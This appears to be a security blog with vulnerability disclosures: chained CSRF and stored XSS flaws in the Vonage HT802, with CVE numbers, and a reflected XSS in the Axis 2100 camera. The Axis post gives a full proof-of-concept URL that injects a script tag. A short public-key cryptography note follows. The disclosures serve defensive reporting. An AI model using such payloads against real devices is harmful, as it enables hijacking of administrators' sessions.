Vonage HT802 – Multiple Vulnerabilities

I have disclosed three vulnerabilities in the Vonage (Grandstream) HT802.  I haven’t received a response from Vonage.  These vulnerabilities can be chained to inject persistent XSS in the Basic Settings screen of the device.

Update: I have the following received CVEs for these vulnerabilities:

1.) Cross-Site Request Forgery (CSRF) vulnerability in the login screen (/cgi-bin/login) allows an attacker to log into a target Vonage device. (CVE-2017-165635)

POC Verified in Firefox 56.0 on macOS

2.) Cross-Site Request Forgery (CSRF) vulnerability in the Basic Settings screen allows an attacker to modify system settings. (CVE-2017-16563)

POC Verified in Firefox 56.0 on macOS

3.) Stored Cross-site scripting (XSS) vulnerability in cgi-bin/config2 in Vonage HT802 allows remote authenticated users to inject arbitrary web script or HTML via the DHCP vendor class ID field (P148). (CVE-2017-16564)

POC Verified in Firefox 56.0 on macOS

These three vulnerabilities can be chained to inject a persistent XSS payload into the Basic Settings page.

Axis 2100 Network Camera 2.03 XSS Vulnerability

Update: this has been assigned CVE-2017-15885.

I have found a vulnerability in the Axis 2100 Network Camera running 2.03 firmware.  Vulnerability has been disclosed to the vendor but the camera is no longer supported.

Reflected XSS in web administration portal in Axis 2100 Network Camera 2.03 allows attacker to execute arbitrary javascript via URL.

POC Verified on Firefox 55.0.3:

http://xxx.xxx.xxx,xxx/view/view.shtml?paramskip=yes&conf_Layout_BGColorEnabled=yes&conf_Layout_OwnBGColorEnabled=no&conf_Layout_OwnBGColor=White&conf_Layout_TextColorEnabled=yes&conf_Layout_OwnTextColorEnabled=no&conf_Layout_OwnTextColor=Black&conf_Layout_BackgroundEnabled=yes&conf_Layout_OwnBackgroundEnabled=no&conf_Layout_OwnBackground=http://&conf_Layout_TitleEnabled=yes&conf_Layout_OwnTitleEnabled=yes&conf_Layout_OwnTitle=%3Cscript%3Ealert('test')%3C/script%3E&conf_Layout_LogoEnabled=yes&conf_Layout_OwnLogoEnabled=no&conf_Layout_OwnLogo=http%3A//&conf_Layout_LinkEnabled=yes&conf_Layout_OwnLinkEnabled=no&conf_Layout_OwnLink=http%3A//&conf_Layout_DescriptionEnabled=yes&conf_Layout_OwnDescriptionEnabled=no&conf_Layout_OwnDescription=&conf_Layout_RelayButtonsEnabled=yes&conf_Layout_AdminButtonsEnabled=yes&conf_Layout_LayoutEnabled=no

Tech Note: Public Key Cryptography

Four rules that are core to the use of public key cryptography and digital signatures:

  • When encrypting a message, use the recipient’s public key
  • When decrypting a message that you have received, use your private key
  • To digitally sign a message that you are sending to someone, use your private key
  • To verify the signature on a message sent to you by someone, use the sender’s public key